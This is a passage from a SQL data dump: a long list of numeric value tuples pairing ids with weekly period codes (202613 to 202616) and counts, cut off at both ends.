'202613',8),(5062,1,'202613',8),(5122,1,'202613',8),(5128,1,'202613',8),(5256,1,'202613',8),(5298,1,'202613',8),(5330,1,'202613',8),(5334,1,'202613',8),(5512,1,'202613',8),(5674,1,'202613',8),(110,1,'202613',9),(482,1,'202613',9),(1596,1,'202613',9),(1724,1,'202613',9),(1734,1,'202613',9),(1743,1,'202613',9),(1770,1,'202613',9),(1776,1,'202613',9),(2063,1,'202613',9),(3063,1,'202613',9),(3066,1,'202613',9),(3090,1,'202613',9),(3251,1,'202613',9),(3278,1,'202613',9),(3313,1,'202613',9),(3479,1,'202613',9),(3482,1,'202613',9),(3534,1,'202613',9),(4357,1,'202613',9),(4368,1,'202613',9),(4400,1,'202613',9),(4412,1,'202613',9),(4454,1,'202613',9),(4524,1,'202613',9),(4591,1,'202613',9),(4657,1,'202613',9),(4674,1,'202613',9),(4722,1,'202613',9),(4756,1,'202613',9),(4776,1,'202613',9),(4874,1,'202613',9),(5028,1,'202613',9),(5042,1,'202613',9),(5067,1,'202613',9),(5248,1,'202613',9),(5289,1,'202613',9),(5320,1,'202613',9),(5383,1,'202613',9),(5464,1,'202613',9),(5467,1,'202613',9),(5567,1,'202613',9),(5585,1,'202613',9),(5666,1,'202613',9),(1594,1,'202613',10),(1610,1,'202613',10),(1612,1,'202613',10),(1728,1,'202613',10),(1766,1,'202613',10),(1768,1,'202613',10),(1782,1,'202613',10),(2457,1,'202613',10),(2609,1,'202613',10),(3006,1,'202613',10),(3271,1,'202613',10),(3316,1,'202613',10),(3531,1,'202613',10),(3721,1,'202613',10),(3742,1,'202613',10),(4301,1,'202613',10),(4363,1,'202613',10),(4416,1,'202613',10),(4587,1,'202613',10),(4648,1,'202613',10),(4688,1,'202613',10),(4888,1,'202613',10),(5134,1,'202613',10),(5153,1,'202613',10),(5264,1,'202613',10),(5409,1,'202613',10),(5601,1,'202613',10),(473,1,'202613',11),(1705,1,'202613',11),(1707,1,'202613',11),(1711,1,'202613',11),(1778,1,'202613',11),(2658,1,'202613',11),(2751,1,'202613',11),(2989,1,'202613',11),(3004,1,'202613',11),(3727,1,'202613',11),(3752,1,'202613',11),(4566,1,'202613',11),(4663,1,'202613',11),(4685,1,'202613',11),(4768,1,'202613',11),(5033,1,'202613',11),(5137,1,'202613',11),(5609,1,'202613',11),(5626,1,'202613',11),(487,1,'202613',12),(570,1,'202613',12),(1584,1,'202613',12),(1701,1,'202613',12),(1739,1,'202613',12),(2558,1,'202613',12),(3023,1,'202613',12),(3267,1,'202613',12),(3438,1,'202613',12),(3738,1,'202613',12),(4326,1,'202613',12),(4529,1,'202613',12),(4645,1,'202613',12),(4668,1,'202613',12),(5492,1,'202613',12),(469,1,'202613',13),(472,1,'202613',13),(1588,1,'202613',13),(1600,1,'202613',13),(2297,1,'202613',13),(3041,1,'202613',13),(3127,1,'202613',13),(4420,1,'202613',13),(4741,1,'202613',13),(5280,1,'202613',13),(5307,1,'202613',13),(5605,1,'202613',13),(5735,1,'202613',13),(471,1,'202613',14),(2775,1,'202613',14),(2804,1,'202613',14),(2956,1,'202613',14),(3297,1,'202613',14),(3764,1,'202613',14),(4238,1,'202613',14),(4556,1,'202613',14),(4660,1,'202613',14),(4983,1,'202613',14),(5071,1,'202613',14),(5076,1,'202613',14),(5080,1,'202613',14),(5259,1,'202613',14),(5400,1,'202613',14),(5420,1,'202613',14),(5461,1,'202613',14),(5696,1,'202613',14),(5769,1,'202613',14),(5771,1,'202613',14),(467,1,'202613',15),(1598,1,'202613',15),(1718,1,'202613',15),(1774,1,'202613',15),(3253,1,'202613',15),(3749,1,'202613',15),(4612,1,'202613',15),(4866,1,'202613',15),(5441,1,'202613',15),(5457,1,'202613',15),(5662,1,'202613',15),(1586,1,'202613',16),(2704,1,'202613',16),(2769,1,'202613',16),(3498,1,'202613',16),(5157,1,'202613',16),(5428,1,'202613',16),(5561,1,'202613',16),(5570,1,'202613',16),(5700,1,'202613',16),(5824,1,'202613',16),(1608,1,'202613',17),(1614,1,'202613',17),(2309,1,'202613',17),(3083,1,'202613',17),(4608,1,'202613',17),(5268,1,'202613',17),(5436,1,'202613',17),(5762,1,'202613',17),(5816,1,'202613',17),(468,1,'202613',18),(1544,1,'202613',18),(4520,1,'202613',18),(5489,1,'202613',18),(5828,1,'202613',18),(5433,1,'202613',19),(5598,1,'202613',19),(4980,1,'202613',20),(5363,1,'202613',20),(5738,1,'202613',20),(470,1,'202613',21),(1602,1,'202613',21),(1780,1,'202613',21),(74,1,'202613',22),(84,1,'202613',22),(335,1,'202613',22),(5163,1,'202613',22),(5593,1,'202613',22),(5785,1,'202613',22),(2503,1,'202613',23),(3102,1,'202613',23),(108,1,'202613',24),(5778,1,'202613',24),(2813,1,'202613',25),(4977,1,'202613',25),(5636,1,'202613',25),(3710,1,'202613',27),(5397,1,'202613',27),(4930,1,'202613',28),(5415,1,'202613',28),(87,1,'202613',29),(5406,1,'202613',30),(5821,1,'202613',31),(5833,1,'202613',31),(2904,1,'202613',32),(5844,1,'202613',32),(474,1,'202613',33),(5454,1,'202613',33),(1582,1,'202613',35),(3781,1,'202613',38),(91,1,'202613',42),(72,1,'202613',47),(89,1,'202613',49),(68,1,'202613',52),(5502,1,'202613',52),(76,1,'202613',54),(5847,1,'202613',75),(80,1,'202613',341),(3060,1,'202613',465),(9,1,'202613',4861),(1720,1,'202614',1),(1751,1,'202614',1),(1782,1,'202614',1),(4400,1,'202614',1),(5122,1,'202614',1),(1596,1,'202614',2),(1747,1,'202614',2),(1772,1,'202614',2),(2248,1,'202614',2),(2751,1,'202614',2),(3247,1,'202614',2),(3285,1,'202614',2),(3534,1,'202614',2),(3721,1,'202614',2),(3746,1,'202614',2),(4275,1,'202614',2),(4416,1,'202614',2),(4514,1,'202614',2),(4996,1,'202614',2),(5037,1,'202614',2),(5067,1,'202614',2),(5134,1,'202614',2),(5271,1,'202614',2),(5320,1,'202614',2),(106,1,'202614',3),(478,1,'202614',3),(1592,1,'202614',3),(2154,1,'202614',3),(2156,1,'202614',3),(2457,1,'202614',3),(2609,1,'202614',3),(3087,1,'202614',3),(3109,1,'202614',3),(3245,1,'202614',3),(3249,1,'202614',3),(3263,1,'202614',3),(3269,1,'202614',3),(3316,1,'202614',3),(3498,1,'202614',3),(4323,1,'202614',3),(4341,1,'202614',3),(4373,1,'202614',3),(4382,1,'202614',3),(4412,1,'202614',3),(4424,1,'202614',3),(4440,1,'202614',3),(4762,1,'202614',3),(4797,1,'202614',3),(4862,1,'202614',3),(4870,1,'202614',3),(4983,1,'202614',3),(4988,1,'202614',3),(5256,1,'202614',3),(5264,1,'202614',3),(5383,1,'202614',3),(5425,1,'202614',3),(5441,1,'202614',3),(5609,1,'202614',3),(477,1,'202614',4),(481,1,'202614',4),(484,1,'202614',4),(488,1,'202614',4),(1697,1,'202614',4),(1745,1,'202614',4),(2063,1,'202614',4),(2150,1,'202614',4),(2161,1,'202614',4),(2165,1,'202614',4),(2252,1,'202614',4),(2617,1,'202614',4),(2965,1,'202614',4),(3257,1,'202614',4),(3259,1,'202614',4),(3265,1,'202614',4),(3271,1,'202614',4),(3273,1,'202614',4),(3278,1,'202614',4),(3280,1,'202614',4),(3430,1,'202614',4),(3489,1,'202614',4),(3531,1,'202614',4),(3727,1,'202614',4),(3777,1,'202614',4),(4329,1,'202614',4),(4357,1,'202614',4),(4363,1,'202614',4),(4428,1,'202614',4),(4517,1,'202614',4),(4529,1,'202614',4),(4566,1,'202614',4),(4582,1,'202614',4),(4648,1,'202614',4),(4657,1,'202614',4),(4691,1,'202614',4),(4709,1,'202614',4),(4747,1,'202614',4),(4753,1,'202614',4),(4768,1,'202614',4),(4866,1,'202614',4),(5020,1,'202614',4),(5028,1,'202614',4),(5137,1,'202614',4),(5248,1,'202614',4),(5378,1,'202614',4),(5412,1,'202614',4),(480,1,'202614',5),(483,1,'202614',5),(486,1,'202614',5),(1707,1,'202614',5),(1732,1,'202614',5),(1737,1,'202614',5),(1739,1,'202614',5),(1743,1,'202614',5),(1768,1,'202614',5),(2293,1,'202614',5),(2296,1,'202614',5),(2658,1,'202614',5),(2809,1,'202614',5),(2964,1,'202614',5),(2993,1,'202614',5),(3005,1,'202614',5),(3045,1,'202614',5),(3069,1,'202614',5),(3097,1,'202614',5),(3107,1,'202614',5),(3261,1,'202614',5),(3290,1,'202614',5),(3479,1,'202614',5),(3742,1,'202614',5),(3752,1,'202614',5),(4408,1,'202614',5),(4444,1,'202614',5),(4454,1,'202614',5),(4457,1,'202614',5),(4546,1,'202614',5),(4591,1,'202614',5),(4654,1,'202614',5),(4697,1,'202614',5),(4706,1,'202614',5),(4741,1,'202614',5),(4883,1,'202614',5),(4888,1,'202614',5),(4897,1,'202614',5),(4976,1,'202614',5),(5024,1,'202614',5),(5042,1,'202614',5),(5050,1,'202614',5),(5054,1,'202614',5),(5058,1,'202614',5),(5140,1,'202614',5),(5253,1,'202614',5),(5323,1,'202614',5),(5334,1,'202614',5),(5578,1,'202614',5),(5662,1,'202614',5),(479,1,'202614',6),(1594,1,'202614',6),(1606,1,'202614',6),(1695,1,'202614',6),(1701,1,'202614',6),(1705,1,'202614',6),(1726,1,'202614',6),(2148,1,'202614',6),(2152,1,'202614',6),(2178,1,'202614',6),(2748,1,'202614',6),(2801,1,'202614',6),(3023,1,'202614',6),(3038,1,'202614',6),(3066,1,'202614',6),(3096,1,'202614',6),(3104,1,'202614',6),(3124,1,'202614',6),(3226,1,'202614',6),(3240,1,'202614',6),(3267,1,'202614',6),(3438,1,'202614',6),(3724,1,'202614',6),(3749,1,'202614',6),(3771,1,'202614',6),(4391,1,'202614',6),(4542,1,'202614',6),(4674,1,'202614',6),(4677,1,'202614',6),(4688,1,'202614',6),(4694,1,'202614',6),(4756,1,'202614',6),(4765,1,'202614',6),(4771,1,'202614',6),(4980,1,'202614',6),(5046,1,'202614',6),(5125,1,'202614',6),(5128,1,'202614',6),(5146,1,'202614',6),(5268,1,'202614',6),(5289,1,'202614',6),(5292,1,'202614',6),(5314,1,'202614',6),(5330,1,'202614',6),(5472,1,'202614',6),(5585,1,'202614',6),(5683,1,'202614',6),(5700,1,'202614',6),(102,1,'202614',7),(471,1,'202614',7),(485,1,'202614',7),(570,1,'202614',7),(1608,1,'202614',7),(1610,1,'202614',7),(1699,1,'202614',7),(1711,1,'202614',7),(1730,1,'202614',7),(1774,1,'202614',7),(2558,1,'202614',7),(2991,1,'202614',7),(3006,1,'202614',7),(3027,1,'202614',7),(3030,1,'202614',7),(3079,1,'202614',7),(3090,1,'202614',7),(3127,1,'202614',7),(3229,1,'202614',7),(3243,1,'202614',7),(3735,1,'202614',7),(3738,1,'202614',7),(4301,1,'202614',7),(4332,1,'202614',7),(4338,1,'202614',7),(4404,1,'202614',7),(4420,1,'202614',7),(4432,1,'202614',7),(4744,1,'202614',7),(4792,1,'202614',7),(4802,1,'202614',7),(4893,1,'202614',7),(4977,1,'202614',7),(5153,1,'202614',7),(5295,1,'202614',7),(5304,1,'202614',7),(5467,1,'202614',7),(5636,1,'202614',7),(5674,1,'202614',7),(5696,1,'202614',7),(110,1,'202614',8),(476,1,'202614',8),(1709,1,'202614',8),(1749,1,'202614',8),(1770,1,'202614',8),(2297,1,'202614',8),(2309,1,'202614',8),(2989,1,'202614',8),(3041,1,'202614',8),(3072,1,'202614',8),(3083,1,'202614',8),(3092,1,'202614',8),(3117,1,'202614',8),(3253,1,'202614',8),(3282,1,'202614',8),(3307,1,'202614',8),(3313,1,'202614',8),(3482,1,'202614',8),(3486,1,'202614',8),(3710,1,'202614',8),(3714,1,'202614',8),(3764,1,'202614',8),(4524,1,'202614',8),(4587,1,'202614',8),(4608,1,'202614',8),(4651,1,'202614',8),(4660,1,'202614',8),(4663,1,'202614',8),(4668,1,'202614',8),(4759,1,'202614',8),(4874,1,'202614',8),(5033,1,'202614',8),(5101,1,'202614',8),(5298,1,'202614',8),(5326,1,'202614',8),(5353,1,'202614',8),(5356,1,'202614',8),(5449,1,'202614',8),(5515,1,'202614',8),(5567,1,'202614',8),(472,1,'202614',9),(482,1,'202614',9),(1590,1,'202614',9),(1614,1,'202614',9),(1713,1,'202614',9),(1715,1,'202614',9),(1776,1,'202614',9),(2775,1,'202614',9),(2911,1,'202614',9),(3004,1,'202614',9),(3251,1,'202614',9),(3275,1,'202614',9),(3731,1,'202614',9),(3774,1,'202614',9),(4326,1,'202614',9),(4377,1,'202614',9),(4703,1,'202614',9),(4878,1,'202614',9),(5301,1,'202614',9),(5512,1,'202614',9),(5582,1,'202614',9),(1598,1,'202614',10),(1600,1,'202614',10),(1724,1,'202614',10),(1734,1,'202614',10),(3287,1,'202614',10),(4238,1,'202614',10),(4368,1,'202614',10),(4387,1,'202614',10),(4556,1,'202614',10),(4681,1,'202614',10),(4700,1,'202614',10),(4712,1,'202614',10),(4776,1,'202614',10),(5157,1,'202614',10),(5409,1,'202614',10),(5457,1,'202614',10),(5605,1,'202614',10),(473,1,'202614',11),(1584,1,'202614',11),(1602,1,'202614',11),(2956,1,'202614',11),(3034,1,'202614',11),(3063,1,'202614',11),(4396,1,'202614',11),(4551,1,'202614',11),(4612,1,'202614',11),(4645,1,'202614',11),(4750,1,'202614',11),(5280,1,'202614',11),(5310,1,'202614',11),(5359,1,'202614',11),(5363,1,'202614',11),(5464,1,'202614',11),(5561,1,'202614',11),(5626,1,'202614',11),(5666,1,'202614',11),(5738,1,'202614',11),(5828,1,'202614',11),(1612,1,'202614',12),(1703,1,'202614',12),(1766,1,'202614',12),(2159,1,'202614',12),(4685,1,'202614',12),(5276,1,'202614',12),(5317,1,'202614',12),(5374,1,'202614',12),(5598,1,'202614',12),(5735,1,'202614',12),(5778,1,'202614',12),(5824,1,'202614',12),(5833,1,'202614',12),(467,1,'202614',13),(4335,1,'202614',13),(5062,1,'202614',13),(5131,1,'202614',13),(5461,1,'202614',13),(5771,1,'202614',13),(469,1,'202614',14),(487,1,'202614',14),(1586,1,'202614',14),(1604,1,'202614',14),(4448,1,'202614',14),(5071,1,'202614',14),(5163,1,'202614',14),(5415,1,'202614',14),(5428,1,'202614',14),(5492,1,'202614',14),(1718,1,'202614',15),(1780,1,'202614',15),(2769,1,'202614',15),(4436,1,'202614',15),(5433,1,'202614',15),(5570,1,'202614',15),(5762,1,'202614',15),(5785,1,'202614',15),(2813,1,'202614',16),(4520,1,'202614',16),(5076,1,'202614',16),(5080,1,'202614',16),(5400,1,'202614',16),(5454,1,'202614',16),(1544,1,'202614',17),(3297,1,'202614',17),(4722,1,'202614',17),(5259,1,'202614',17),(5307,1,'202614',17),(1722,1,'202614',18),(2704,1,'202614',18),(2804,1,'202614',18),(5489,1,'202614',18),(5601,1,'202614',18),(5821,1,'202614',18),(5406,1,'202614',19),(3102,1,'202614',20),(5420,1,'202614',20),(74,1,'202614',21),(1728,1,'202614',21),(5502,1,'202614',21),(5816,1,'202614',21),(468,1,'202614',22),(1588,1,'202614',23),(470,1,'202614',24),(1778,1,'202614',24),(5593,1,'202614',24),(5769,1,'202614',25),(335,1,'202614',26),(474,1,'202614',26),(1582,1,'202614',26),(2904,1,'202614',26),(5436,1,'202614',27),(4930,1,'202614',29),(87,1,'202614',31),(2503,1,'202614',31),(108,1,'202614',32),(84,1,'202614',36),(5397,1,'202614',38),(5847,1,'202614',40),(91,1,'202614',42),(5844,1,'202614',43),(89,1,'202614',51),(76,1,'202614',53),(68,1,'202614',65),(72,1,'202614',76),(3781,1,'202614',86),(3060,1,'202614',193),(3541,1,'202614',278),(80,1,'202614',279),(1741,1,'202614',284),(9,1,'202614',4836),(2248,1,'202615',1),(2609,1,'202615',1),(3109,1,'202615',1),(3285,1,'202615',1),(3287,1,'202615',1),(4440,1,'202615',1),(4444,1,'202615',1),(4858,1,'202615',1),(4870,1,'202615',1),(4893,1,'202615',1),(5037,1,'202615',1),(5461,1,'202615',1),(1745,1,'202615',2),(1747,1,'202615',2),(2150,1,'202615',2),(2156,1,'202615',2),(2252,1,'202615',2),(2296,1,'202615',2),(2993,1,'202615',2),(3079,1,'202615',2),(3107,1,'202615',2),(3278,1,'202615',2),(4363,1,'202615',2),(4408,1,'202615',2),(4591,1,'202615',2),(4888,1,'202615',2),(5042,1,'202615',2),(482,1,'202615',3),(1709,1,'202615',3),(1722,1,'202615',3),(1772,1,'202615',3),(2063,1,'202615',3),(2178,1,'202615',3),(2293,1,'202615',3),(3027,1,'202615',3),(3087,1,'202615',3),(3104,1,'202615',3),(3229,1,'202615',3),(3245,1,'202615',3),(3257,1,'202615',3),(3259,1,'202615',3),(3273,1,'202615',3),(3280,1,'202615',3),(3731,1,'202615',3),(4542,1,'202615',3),(4587,1,'202615',3),(5140,1,'202615',3),(5320,1,'202615',3),(5467,1,'202615',3),(477,1,'202615',4),(484,1,'202615',4),(1701,1,'202615',4),(1707,1,'202615',4),(1715,1,'202615',4),(1720,1,'202615',4),(1751,1,'202615',4),(1776,1,'202615',4),(1782,1,'202615',4),(2152,1,'202615',4),(2165,1,'202615',4),(3097,1,'202615',4),(3247,1,'202615',4),(3261,1,'202615',4),(3265,1,'202615',4),(3269,1,'202615',4),(3282,1,'202615',4),(4391,1,'202615',4),(4404,1,'202615',4),(4412,1,'202615',4),(4428,1,'202615',4),(4582,1,'202615',4),(4677,1,'202615',4),(4681,1,'202615',4),(4866,1,'202615',4),(4874,1,'202615',4),(4878,1,'202615',4),(4883,1,'202615',4),(1695,1,'202615',5),(1697,1,'202615',5),(1732,1,'202615',5),(1734,1,'202615',5),(1749,1,'202615',5),(1766,1,'202615',5),(2154,1,'202615',5),(2748,1,'202615',5),(2956,1,'202615',5),(2991,1,'202615',5),(3066,1,'202615',5),(3092,1,'202615',5),(3263,1,'202615',5),(3267,1,'202615',5),(3271,1,'202615',5),(3714,1,'202615',5),(3721,1,'202615',5),(3742,1,'202615',5),(4341,1,'202615',5),(4368,1,'202615',5),(4373,1,'202615',5),(4377,1,'202615',5),(4382,1,'202615',5),(4432,1,'202615',5),(4546,1,'202615',5),(4668,1,'202615',5),(4709,1,'202615',5),(4712,1,'202615',5),(5024,1,'202615',5),(5028,1,'202615',5),(5125,1,'202615',5),(5146,1,'202615',5),(5153,1,'202615',5),(5264,1,'202615',5),(5301,1,'202615',5),(5317,1,'202615',5),(5334,1,'202615',5),(5359,1,'202615',5),(5378,1,'202615',5),(5383,1,'202615',5),(5425,1,'202615',5),(110,1,'202615',6),(479,1,'202615',6),(480,1,'202615',6),(1705,1,'202615',6),(1737,1,'202615',6),(1739,1,'202615',6),(1743,1,'202615',6),(2457,1,'202615',6),(2751,1,'202615',6),(2801,1,'202615',6),(3038,1,'202615',6),(3063,1,'202615',6),(3069,1,'202615',6),(3090,1,'202615',6),(3096,1,'202615',6),(3275,1,'202615',6),(3482,1,'202615',6),(3486,1,'202615',6),(3727,1,'202615',6),(3746,1,'202615',6),(4338,1,'202615',6),(4387,1,'202615',6),(4396,1,'202615',6),(4416,1,'202615',6),(4424,1,'202615',6),(4648,1,'202615',6),(4674,1,'202615',6),(4703,1,'202615',6),(4792,1,'202615',6),(4802,1,'202615',6),(4897,1,'202615',6),(4976,1,'202615',6),(4988,1,'202615',6),(5062,1,'202615',6),(5134,1,'202615',6),(5256,1,'202615',6),(5412,1,'202615',6),(5464,1,'202615',6),(5472,1,'202615',6),(472,1,'202615',7),(483,1,'202615',7),(1590,1,'202615',7),(1703,1,'202615',7),(1726,1,'202615',7),(1768,1,'202615',7),(1770,1,'202615',7),(2161,1,'202615',7),(2658,1,'202615',7),(2911,1,'202615',7),(3034,1,'202615',7),(3045,1,'202615',7),(3124,1,'202615',7),(3226,1,'202615',7),(3249,1,'202615',7),(4454,1,'202615',7),(4697,1,'202615',7),(4706,1,'202615',7),(4756,1,'202615',7),(4771,1,'202615',7),(4797,1,'202615',7),(4983,1,'202615',7),(4996,1,'202615',7),(5020,1,'202615',7),(5058,1,'202615',7),(5080,1,'202615',7),(5276,1,'202615',7),(5295,1,'202615',7),(5330,1,'202615',7),(5409,1,'202615',7),(5515,1,'202615',7),(5585,1,'202615',7),(5683,1,'202615',7),(1699,1,'202615',8),(1711,1,'202615',8),(1713,1,'202615',8),(1778,1,'202615',8),(1780,1,'202615',8),(2989,1,'202615',8),(3023,1,'202615',8),(3127,1,'202615',8),(3240,1,'202615',8),(3243,1,'202615',8),(3313,1,'202615',8),(3531,1,'202615',8),(3774,1,'202615',8),(4329,1,'202615',8),(4436,1,'202615',8),(4566,1,'202615',8),(4608,1,'202615',8),(4654,1,'202615',8),(4663,1,'202615',8),(4688,1,'202615',8),(4691,1,'202615',8),(4765,1,'202615',8),(4977,1,'202615',8),(5310,1,'202615',8),(5314,1,'202615',8),(5356,1,'202615',8),(5561,1,'202615',8),(478,1,'202615',9),(481,1,'202615',9),(486,1,'202615',9),(1612,1,'202615',9),(1730,1,'202615',9),(3253,1,'202615',9),(3316,1,'202615',9),(3430,1,'202615',9),(3738,1,'202615',9),(3777,1,'202615',9),(4238,1,'202615',9),(4323,1,'202615',9),(4332,1,'202615',9),(4357,1,'202615',9),(4400,1,'202615',9),(4457,1,'202615',9),(4645,1,'202615',9),(4657,1,'202615',9),(4700,1,'202615',9),(4741,1,'202615',9),(5054,1,'202615',9),(5292,1,'202615',9),(5298,1,'202615',9),(5326,1,'202615',9),(5353,1,'202615',9),(5449,1,'202615',9),(5567,1,'202615',9),(5609,1,'202615',9),(102,1,'202615',10),(1594,1,'202615',10),(1604,1,'202615',10),(2148,1,'202615',10),(2297,1,'202615',10),(2558,1,'202615',10),(2617,1,'202615',10),(2964,1,'202615',10),(2965,1,'202615',10),(3005,1,'202615',10),(3072,1,'202615',10),(3083,1,'202615',10),(3102,1,'202615',10),(3489,1,'202615',10),(3724,1,'202615',10),(3752,1,'202615',10),(3771,1,'202615',10),(4275,1,'202615',10),(4514,1,'202615',10),(4517,1,'202615',10),(4551,1,'202615',10),(4556,1,'202615',10),(4750,1,'202615',10),(4862,1,'202615',10),(5033,1,'202615',10),(5122,1,'202615',10),(5248,1,'202615',10),(5307,1,'202615',10),(5374,1,'202615',10),(5626,1,'202615',10),(5828,1,'202615',10),(1600,1,'202615',11),(1718,1,'202615',11),(2809,1,'202615',11),(3030,1,'202615',11),(3117,1,'202615',11),(3307,1,'202615',11),(3735,1,'202615',11),(4612,1,'202615',11),(4694,1,'202615',11),(4744,1,'202615',11),(4759,1,'202615',11),(4762,1,'202615',11),(4768,1,'202615',11),(5050,1,'202615',11),(5071,1,'202615',11),(5131,1,'202615',11),(5137,1,'202615',11),(5157,1,'202615',11),(5268,1,'202615',11),(5289,1,'202615',11),(5323,1,'202615',11),(5578,1,'202615',11),(5601,1,'202615',11),(485,1,'202615',12),(1592,1,'202615',12),(1724,1,'202615',12),(2775,1,'202615',12),(3004,1,'202615',12),(3438,1,'202615',12),(3498,1,'202615',12),(4448,1,'202615',12),(4529,1,'202615',12),(4685,1,'202615',12),(4753,1,'202615',12),(4980,1,'202615',12),(5128,1,'202615',12),(5304,1,'202615',12),(5363,1,'202615',12),(5512,1,'202615',12),(5582,1,'202615',12),(5605,1,'202615',12),(5636,1,'202615',12),(5674,1,'202615',12),(5771,1,'202615',12),(5824,1,'202615',12),(476,1,'202615',13),(488,1,'202615',13),(1596,1,'202615',13),(1774,1,'202615',13),(2159,1,'202615',13),(3710,1,'202615',13),(4326,1,'202615',13),(4651,1,'202615',13),(4747,1,'202615',13),(5101,1,'202615',13),(5259,1,'202615',13),(5457,1,'202615',13),(2309,1,'202615',14),(3041,1,'202615',14),(3290,1,'202615',14),(4301,1,'202615',14),(4420,1,'202615',14),(5163,1,'202615',14),(5428,1,'202615',14),(5598,1,'202615',14),(5662,1,'202615',14),(5735,1,'202615',14),(469,1,'202615',15),(1586,1,'202615',15),(1608,1,'202615',15),(2769,1,'202615',15),(3006,1,'202615',15),(4722,1,'202615',15),(5253,1,'202615',15),(5280,1,'202615',15),(5415,1,'202615',15),(5666,1,'202615',15),(5833,1,'202615',15),(570,1,'202615',16),(1598,1,'202615',16),(1606,1,'202615',16),(3534,1,'202615',16),(5492,1,'202615',16),(5778,1,'202615',16),(1610,1,'202615',17),(1728,1,'202615',17),(2813,1,'202615',17),(3297,1,'202615',17),(3749,1,'202615',17),(4524,1,'202615',17),(4660,1,'202615',17),(5076,1,'202615',17),(5489,1,'202615',17),(1584,1,'202615',18),(1602,1,'202615',18),(3479,1,'202615',18),(3764,1,'202615',18),(5570,1,'202615',18),(5696,1,'202615',18),(5700,1,'202615',18),(467,1,'202615',19),(471,1,'202615',19),(2804,1,'202615',19),(4520,1,'202615',19),(4776,1,'202615',19),(5271,1,'202615',19),(3060,1,'202615',20),(4335,1,'202615',20),(5067,1,'202615',20),(5821,1,'202615',20),(473,1,'202615',21),(5400,1,'202615',21),(1614,1,'202615',22),(5433,1,'202615',22),(5436,1,'202615',22),(1588,1,'202615',23),(5420,1,'202615',23),(5738,1,'202615',23),(487,1,'202615',24),(5785,1,'202615',24),(1544,1,'202615',25),(5502,1,'202615',25),(2704,1,'202615',26),(5441,1,'202615',26),(5762,1,'202615',27),(5454,1,'202615',29),(2503,1,'202615',30),(5816,1,'202615',30),(468,1,'202615',32),(5593,1,'202615',34),(5769,1,'202615',35),(470,1,'202615',36),(5406,1,'202615',36),(74,1,'202615',37),(108,1,'202615',37),(2904,1,'202615',38),(1582,1,'202615',39),(3251,1,'202615',39),(335,1,'202615',40),(5397,1,'202615',40),(87,1,'202615',43),(474,1,'202615',43),(5844,1,'202615',46),(4930,1,'202615',47),(5847,1,'202615',48),(84,1,'202615',54),(76,1,'202615',55),(3781,1,'202615',55),(68,1,'202615',68),(91,1,'202615',68),(72,1,'202615',122),(80,1,'202615',220),(3541,1,'202615',613),(1741,1,'202615',621),(89,1,'202615',765),(9,1,'202615',4726),(1732,1,'202616',2),(4768,1,'202616',2),(5137,1,'202616',2),(106,1,'202616',3),(1772,1,'202616',3),(2156,1,'202616',3),(2248,1,'202616',3),(2293,1,'202616',3),(3285,1,'202616',3),(4341,1,'202616',3),(4382,1,'202616',3),(4657,1,'202616',3),(4681,1,'202616',3),(4688,1,'202616',3),(4706,1,'202616',3),(4747,1,'202616',3),(4983,1,'202616',3),(5295,1,'202616',3),(110,1,'202616',4),(1703,1,'202616',4),(1709,1,'202616',4),(1713,1,'202616',4),(1743,1,'202616',4),(2252,1,'202616',4),(2609,1,'202616',4),(2911,1,'202616',4),(3063,1,'202616',4),(3247,1,'202616',4),(3280,1,'202616',4),(3489,1,'202616',4),(3721,1,'202616',4),(4517,1,'202616',4),(4741,1,'202616',4),(4765,1,'202616',4),(1739,1,'202616',5),(2152,1,'202616',5),(2161,1,'202616',5),(2993,1,'202616',5),(3006,1,'202616',5),(3038,1,'202616',5),(3045,1,'202616',5),(3079,1,'202616',5),(3104,1,'202616',5),(3273,1,'202616',5),(3287,1,'202616',5),(3752,1,'202616',5),(4323,1,'202616',5),(4404,1,'202616',5),(4412,1,'202616',5),(4416,1,'202616',5),(4457,1,'202616',5),(4648,1,'202616',5),(4677,1,'202616',5),(4709,1,'202616',5),(4762,1,'202616',5),(5271,1,'202616',5),(5280,1,'202616',5),(5320,1,'202616',5),(5636,1,'202616',5),(472,1,'202616',6),(482,1,'202616',6),(1590,1,'202616',6),(1695,1,'202616',6),(1711,1,'202616',6),(1766,1,'202616',6),(2150,1,'202616',6),(2965,1,'202616',6),(3005,1,'202616',6),(3041,1,'202616',6),(3072,1,'202616',6),(3107,1,'202616',6),(3240,1,'202616',6),(3245,1,'202616',6),(3263,1,'202616',6),(3278,1,'202616',6),(3479,1,'202616',6),(3714,1,'202616',6),(3727,1,'202616',6),(3771,1,'202616',6),(4326,1,'202616',6),(4329,1,'202616',6),(4332,1,'202616',6),(4338,1,'202616',6),(4357,1,'202616',6),(4387,1,'202616',6),(4440,1,'202616',6),(4514,1,'202616',6),(4663,1,'202616',6),(4712,1,'202616',6),(4756,1,'202616',6),(4771,1,'202616',6),(4776,1,'202616',6),(4976,1,'202616',6),(4988,1,'202616',6),(5028,1,'202616',6),(5033,1,'202616',6),(5046,1,'202616',6),(5050,1,'202616',6),(5289,1,'202616',6),(5292,1,'202616',6),(5301,1,'202616',6),(5304,1,'202616',6),(5323,1,'202616',6),(5334,1,'202616',6),(479,1,'202616',7),(481,1,'202616',7),(1606,1,'202616',7),(1697,1,'202616',7),(1705,1,'202616',7),(1768,1,'202616',7),(2296,1,'202616',7),(2801,1,'202616',7),(2809,1,'202616',7),(3034,1,'202616',7),(3087,1,'202616',7),(3127,1,'202616',7),(3229,1,'202616',7),(3249,1,'202616',7),(3316,1,'202616',7),(3430,1,'202616',7),(3498,1,'202616',7),(3531,1,'202616',7),(3731,1,'202616',7),(3735,1,'202616',7),(3742,1,'202616',7),(3764,1,'202616',7),(3774,1,'202616',7),(4377,1,'202616',7),(4408,1,'202616',7),(4546,1,'202616',7),(4566,1,'202616',7),(4674,1,'202616',7),(4703,1,'202616',7),(4744,1,'202616',7),(4977,1,'202616',7),(5062,1,'202616',7),(5101,1,'202616',7),(5134,1,'202616',7),(5298,1,'202616',7),(5425,1,'202616',7),(102,1,'202616',8),(480,1,'202616',8),(483,1,'202616',8),(484,1,'202616',8),(486,1,'202616',8),(1610,1,'202616',8),(1612,1,'202616',8),(1701,1,'202616',8),(1715,1,'202616',8),(1726,1,'202616',8),(1730,1,'202616',8),(1745,1,'202616',8),(1749,1,'202616',8),(1776,1,'202616',8),(2956,1,'202616',8),(3066,1,'202616',8),(3109,1,'202616',8),(3117,1,'202616',8),(3259,1,'202616',8),(3261,1,'202616',8),(3267,1,'202616',8),(3269,1,'202616',8),(3271,1,'202616',8),(3313,1,'202616',8),(3438,1,'202616',8),(3482,1,'202616',8),(4391,1,'202616',8),(4454